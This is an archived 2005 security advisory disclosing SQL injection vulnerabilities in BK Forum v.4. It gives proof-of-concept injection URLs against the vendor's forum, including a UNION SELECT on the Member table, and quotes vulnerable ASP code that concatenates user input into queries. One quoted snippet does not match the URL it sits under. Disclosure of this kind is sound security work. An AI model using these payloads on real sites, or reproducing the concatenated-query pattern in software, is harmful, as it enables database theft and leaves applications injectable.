bkforum4.txt

2005-06-01T00:00:00
ID PACKETSTORM:37824
Type packetstorm
Reporter Diabolic Crab
Modified 2005-06-01T00:00:00

Description

                                        
                                            `  
  
Dcrab 's Security Advisory  
[Hsc Security Group] http://www.hackerscenter.com/  
[dP Security] http://digitalparadox.org/  
  
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah  
  
Severity: High  
Title: Multiple Sql injection vulnerabilities in BK Forum v.4  
Date: 23/04/2005  
  
Vendor: BKdev  
Vendor Website: http://www.bkdev.net  
Summary: There are, multiple sql injection vulnerabilities in bk forum v.4.  
  
  
Proof of Concept Exploits:   
  
http://forum.bkdev.net/member.asp?id=10%20UNION%20Select%20*%20from%20Member%20where%20memName%20=%20'dc'  
[CODE]   
id = request.querystring("id")  
sql = "select * from Member where memID = " & id  
set rs = conn.execute(sql)  
[/CODE]  
http://forum.bkdev.net/forum.asp?forum='SQL INJECTION  
[CODE]  
id = request.querystring("id")  
sql = "select * from Member where memID = " & id  
set rs = conn.execute(sql)  
[/CODE]  
http://forum.bkdev.net/register.asp  
  
All the form values are vulnerable to sql injection  
[CODE]  
sql = "insert into Member (memName, memPassword, memFirstName, memLastName, memEmail, memHomepage, " & _  
"memDate, memLevel, memSignature, memPic, memAbout, memAcceptNotification, memShowAvatar, memLoggedOn, " & _  
"memLastActive) values ('" & memname & "', '" & mempw & "', '" & firstname & "', '" & lastname & "', " & _  
"'" & email & "', '" & homepage & "', #" & now & "#, " & LEVEL_MEMBER & ", '" & signature & "', " & _  
"'" & picture & "', '" & about & "', " & notify & ", " & avatar & ", " & false & ", #" & now & "#)"  
[/CODE]  
  
  
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah  
  
Author:   
These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for my soon to come out book on Secure coding with php.  
`